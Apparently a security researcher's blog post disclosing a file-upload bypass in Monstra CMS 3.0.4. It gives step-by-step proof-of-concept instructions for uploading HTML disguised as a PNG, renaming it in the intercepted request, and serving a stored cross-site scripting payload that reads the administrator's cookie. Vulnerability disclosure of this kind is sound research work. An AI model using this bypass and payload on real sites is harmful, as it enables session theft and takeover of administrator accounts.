<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  

  
  <title>Bypass the HTML file suffix restriction when uploading files | beautiful test</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="0x01I installed the latest version of monstra CMS and found upload bypass in the systemIn the latest version(3.0.4), the system forbids HTML suffix name upload, but now it can bypass it.   0x02Vulnera">
<meta property="og:type" content="article">
<meta property="og:title" content="Bypass the HTML file suffix restriction when uploading files">
<meta property="og:url" content="http://yoursite.com/2019/10/12/Bypass-the-HTML-file-suffix-restriction-when-uploading-files/index.html">
<meta property="og:site_name" content="beautiful test">
<meta property="og:description" content="0x01I installed the latest version of monstra CMS and found upload bypass in the systemIn the latest version(3.0.4), the system forbids HTML suffix name upload, but now it can bypass it.   0x02Vulnera">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://i.loli.net/2019/10/12/8PwIjNJXZu1TULV.png">
<meta property="og:image" content="https://i.loli.net/2019/10/12/FenPgaHhEcuR7xI.png">
<meta property="og:image" content="https://i.loli.net/2019/10/12/IKx9s3GArfTSLZa.png">
<meta property="og:image" content="https://i.loli.net/2019/10/12/gK1hOqvHtEIAJNL.png">
<meta property="og:image" content="https://i.loli.net/2019/10/12/tgcb9dJELnNDrx8.png">
<meta property="og:image" content="https://i.loli.net/2019/10/12/9oY3Vsy1IwCehjf.png">
<meta property="og:updated_time" content="2019-10-13T02:54:03.407Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Bypass the HTML file suffix restriction when uploading files">
<meta name="twitter:description" content="0x01I installed the latest version of monstra CMS and found upload bypass in the systemIn the latest version(3.0.4), the system forbids HTML suffix name upload, but now it can bypass it.   0x02Vulnera">
<meta name="twitter:image" content="https://i.loli.net/2019/10/12/8PwIjNJXZu1TULV.png">
  
    <link rel="alternate" href="/atom.xml" title="beautiful test" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/default-avatar.jpg">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/css/highlight.css">
  <script>
  let antiquityStorage = window.sessionStorage.getItem('antiquitySessionStorage');
  if (antiquityStorage == '' || antiquityStorage == null) {
    var antiquityLoader = '<div id="loaderbox"><div class="loader"><div class="load-roll"><div class="load-top"></div><div class="load-right"></div><div class="load-bottom"></div></div></div></div>';
    document.write(antiquityLoader);
    document.body.style.overflow = 'hidden'
  }
  </script>
</head>
</html>
<body>
  <div id="fullpage" class="mobile-nav-right">
    
      <div id="wrapper" style="background-image: url(/images/test.jpg)" title="为了更安全的互联网">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-right">
      
        <a class="nav-item" href="/" title
        
        >首页</a>
      
        <a class="nav-item" href="/archives" title
        
        >归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-right">
        <section id="main"><article id="post-Bypass-the-HTML-file-suffix-restriction-when-uploading-files" class="article global-container article-type-post" itemscope itemprop="blogPost">
  
    <header class="article-header">
      
  
    <h1 class="article-title" itemprop="name">
      Bypass the HTML file suffix restriction when uploading files
    </h1>
  

    </header>
  
  <div class="article-meta">
    <a href="/2019/10/12/Bypass-the-HTML-file-suffix-restriction-when-uploading-files/" class="article-date">
  <time datetime="2019-10-12T12:55:33.000Z" itemprop="datePublished">2019-10-12</time>
</a>
    
    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <p><strong>0x01</strong><br>I installed the latest version of monstra CMS and found upload bypass in the system<br><strong>In the latest version(3.0.4), the system forbids HTML suffix name upload, but now it can bypass it.</strong></p>
<p><img src="https://i.loli.net/2019/10/12/8PwIjNJXZu1TULV.png" alt="图片.png"></p>
<p><img src="https://i.loli.net/2019/10/12/FenPgaHhEcuR7xI.png" alt="图片.png"></p>
<p><strong>0x02</strong><br><strong>Vulnerability proof</strong></p>
<p>You can bypass the file upload limit by putting double quotes before the suffix of HTML </p>
<p>1  Visit website http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login</p>
<p>2  Save html codes with ‘.png’extensions. and upload it like below.</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">&lt;html&gt; </span><br><span class="line">    &lt;head&gt; </span><br><span class="line">	    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;</span><br><span class="line">        &lt;title&gt;hacker&lt;/title&gt; </span><br><span class="line">    &lt;/head&gt; </span><br><span class="line">    &lt;body&gt; </span><br><span class="line">     &lt;svg/onload=alert(document.cookie)&gt;</span><br><span class="line">    &lt;/body&gt; </span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></div>

<p><img src="https://i.loli.net/2019/10/12/IKx9s3GArfTSLZa.png" alt="图片.png"></p>
<p>Click the uploaded file and Grab the packet and change the suffix name to XXX””.html at filename，This circumvents this limitation.</p>
<p><img src="https://i.loli.net/2019/10/12/gK1hOqvHtEIAJNL.png" alt="图片.png"></p>
<p><img src="https://i.loli.net/2019/10/12/tgcb9dJELnNDrx8.png" alt="图片.png"></p>
<p>4 move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]</p>
<p> You can see that you executed HTML and JS code，If you access this file,  you can get the administrator’s cookie and execute any JS code</p>
<p><img src="https://i.loli.net/2019/10/12/9oY3Vsy1IwCehjf.png" alt="图片.png"></p>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
      <a href="/2019/10/13/SQL-injection-in-Gila-CMS-version-1-11-4/" id="article-nav-newer" class="article-nav-link-wrap">
        <strong class="article-nav-caption"></strong>
        <div class="article-nav-title">
          
            SQL injection in Gila CMS version 1.11.4
          
        </div>
      </a>
    
  </div>
  <div class="article-nav-block">
    
      <a href="/2019/09/22/正则表达式总结和引起的思考/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title">正则表达式总结和引起的思考</div>
        <strong class="article-nav-caption"></strong>
      </a>
    
  </div>
</nav>

    
<div id="gitmentContainer"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/code-title.png" title="为了更安全的互联网"></img>
    <h3 class="avatar-name">
      
        泰斯特
      
    </h3>
    <p class="avatar-slogan">
      搬砖工程师。
    </p>
  </div>
</div>


  
    

  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/12/12/Get-Some-Keys/">Get Some Keys</a>
          </li>
        
          <li>
            <a href="/2019/10/20/Java注解/">Java注解</a>
          </li>
        
          <li>
            <a href="/2019/10/13/SQL-injection-in-Gila-CMS-version-1-11-4/">SQL injection in Gila CMS version 1.11.4</a>
          </li>
        
          <li>
            <a href="/2019/10/12/Bypass-the-HTML-file-suffix-restriction-when-uploading-files/">Bypass the HTML file suffix restriction when uploading files</a>
          </li>
        
          <li>
            <a href="/2019/09/22/正则表达式总结和引起的思考/">正则表达式总结和引起的思考</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
        <a style="display: block;" href="https://blog.ssssdl.xyz/" title target='_blank'
        >ssssdl</a>
      
        <a style="display: block;" href="https://lingwu111.github.io/" title target='_blank'
        >lingwu</a>
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2019 test &nbsp;&nbsp;
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a href="https://github.com/yiluyanxia/hexo-theme-antiquity">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>

  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>